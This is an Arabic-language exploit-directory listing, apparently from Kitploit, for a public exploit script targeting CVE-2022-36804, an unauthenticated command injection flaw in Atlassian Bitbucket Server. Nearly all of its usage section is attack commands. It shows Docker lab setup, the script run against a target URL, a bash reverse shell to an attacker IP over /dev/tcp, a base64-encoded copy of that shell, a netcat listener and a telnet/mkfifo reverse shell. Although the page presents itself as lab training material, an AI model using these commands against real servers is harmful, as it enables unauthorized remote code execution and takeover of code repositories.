Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-36804 — تم اكتشاف ثغرة أمنية خطيرة من نوع حقن الأوامر (Command Injection) في نقاط نهاية (Endpoints) متعددة لواجهة برمجة التطبيقات (API) في خادم Atlassian Bitbucket ومركز البيانات (Data Center). تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17 و<7.17.10 و<7.21.4 و<8.0.3 و<8.1.2 و<8.2.2 و<8.3.1 | Kitploit
أدوات/GitHubGitHub/walnutsecurity/cve-2022-36804
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةمختبرات وتدريب عملي
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

تم اكتشاف ثغرة أمنية خطيرة من نوع حقن الأوامر (Command Injection) في نقاط نهاية (Endpoints) متعددة لواجهة برمجة التطبيقات (API) في خادم Atlassian Bitbucket ومركز البيانات (Data Center). تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17 و<7.17.10 و<7.21.4 و<8.0.3 و<8.1.2 و<8.2.2 و<8.3.1

84منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2022-36804: RCE قبل المصادقة في Atlassian Bitbucket Server

تم اكتشاف ثغرة حرجة في حقن الأوامر في نقاط نهاية API متعددة في Atlassian Bitbucket Server وData Center. تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17> و<7.17.10> و<7.21.4> و<8.0.3> و<8.1.2> و<8.2.2> و<8.3.1>

مختبر CVE-2022-36804

بناء Docker

root@kitploit:~
docker build -t bitbucket .

تشغيل Docker

root@kitploit:~
docker run -it bitbucket

استخدام cve-2022-36804.py

التحقق من تنفيذ التعليمات البرمجية عن بُعد (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

التحقق من RCE باستخدام أمر مخصص (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

التحقق من RCE باستخدام أمر مخصص ومفتاح مشروع واسم مستودع

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

التحقق من مستودع خاص

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074CFF8A5D13088332C8DF0CD8A7CE7

الحصول على شل باستخدام netcat

استبدل 172.17.0.3 بعنوان IP المحلي الخاص بك

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

ابدأ مستمع netcat بالأمر التالي:

root@kitploit:~
nc -lvp 4444

قم بتحويل /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 إلى base64 في حال حدوث خطأ في تنفيذ الحمولة.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

إذا كنت لا تزال تواجه أي خطأ، فنفّذ الأمر التالي:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

يُنصح بتثبيت إصدار Bitbucket Server المتأثر بالثغرة على جهاز يعمل بنظام Windows/Linux لأغراض التدريب. سيكون الحصول على قشرة عكسية (reverse shell) أسهل مقارنةً بصور Docker.

يمكن العثور على مزيد من المعلومات هنا

المراجع

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
تنزيل الأداة